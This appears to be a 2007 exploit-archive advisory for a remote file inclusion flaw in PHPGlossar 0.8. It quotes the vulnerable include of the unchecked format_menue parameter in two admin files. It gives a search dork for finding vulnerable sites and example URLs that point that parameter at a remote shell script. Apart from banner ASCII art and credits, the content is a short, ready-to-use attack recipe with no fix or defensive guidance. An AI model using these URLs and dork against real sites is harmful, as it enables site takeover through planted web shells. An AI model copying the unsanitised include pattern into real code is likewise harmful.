[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : PHPGlossar 0.8 (format_menue) Remote File Inclusion Vulnerabilities
# Published : 2007-05-16
# Author : kezzap66345
# Previous Title : Glossword 1.8.1 custom_vars.php Remote File Inclusion Vulnerability
# Next Title : SimpNews <= 2.40.01 (print.php newnr) Remote SQL Injection Exploit


?????__________________________________________?????
????????_____________________________________???????
???????????_________________________________????????
??????????????_____________________________?????????
????????????????__________________________??????????
???????????????????______________________???????????
?????????????????????___________________????????????
??????????????????????_________________?????????????
????????????????????????_______________?????????????
??????????????????????????_____________?????????????
___?????????????????????????__________??????????????
_____?????????????????????????________??????????????
________???????????????????????_______??????????????
___________??????????????????????_____??????????????
________________???????????????????___??????????????
_____________________???????????????__??????????????
___________________________????????????????????????_
_____________________???????????????????????????____
______________???????????????????????????????_______
___________???????????????????????????????????______
________????????????????????????????????????????____
______????????_____??????????????????????????????___
____?????????_______??????????????????????????????__
__???????????_______???????????????????????????????_
_?????????????_____?????????????????????????????????
????????????????????????????????????????????????????
????????????????????????????????????????????????????
????????????????????????????????????????????????????
????????????????????????????????????????????????????
_??????????????????????????????????????????????????_
__?????????????????????????????????????????????????_
_____?????????????????????????????????????????????__
_________????????????????????????????????????????___
_______________??????????????????????????????????___
_________________???????????????????????????????____
_________________???????????????????????????________
________________??????????_____??????????___________
_________________?????_________?????_________?????__
__________????_________????____________?????????____
__________?????????????????_____??????????__________
__________?????????????????___?????_________________
__________?????______??????_________________________
Cyber-warrior.org
#PHPGlossar Version 0.8 <=  Remote File Inclusion Vulnerability
#
#Dork:"PHPGlossar Version 0.8"
#
#Vuln Code
##############################################################################################
#
#ERROR1:admin/inc/change_action.php and admin/inc/add.php
#
#<?PHP include ("$format_menue");?>   <<< RFI CODE
#
#
#BUG1:
#
#Example1:http://site.com/path/admin/inc/change_action.php?format_menue=[[Sh3LL
Script]]
#
#Example1:http://site.com/path/admin/inc/add.php?format_menue=[[Sh3LL
Script]]
#
#
#Script Download
##############################################################################################
#
#http://www.crear.de/2003/dienste/phpdownloadlinks_0.6/load_page.php?uid=7
#
##############################################################################################
#
#kezzap66345@hotmail.com
#
#Special Thanks:##### x0r0n ##### ajan
########Str0ke#########################################
##############################################################################################
##############################################################################################

# www.Syue.com [2007-05-16]